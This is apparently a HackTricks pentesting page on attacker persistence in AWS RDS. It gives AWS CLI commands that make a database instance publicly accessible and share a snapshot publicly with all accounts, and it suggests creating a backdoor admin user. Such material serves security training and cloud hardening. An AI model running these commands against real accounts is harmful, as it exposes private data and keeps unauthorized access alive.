Files
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
Carlos Polop 716aa06779 translate 2
2025-01-01 23:55:27 +01:00

894 B

AWS - RDS Persistence

{{#include ../../../banners/hacktricks-training.md}}

RDS

For more information check:

{{#ref}} ../aws-services/aws-relational-database-rds-enum.md {{#endref}}

Make instance publicly accessible: rds:ModifyDBInstance

An attacker with this permission can modify an existing RDS instance to enable public accessibility.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Create an admin user inside the DB

An attacker could just create a user inside the DB so even if the master users password is modified he doesn't lose the access to the database.

Make snapshot public

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

{{#include ../../../banners/hacktricks-training.md}}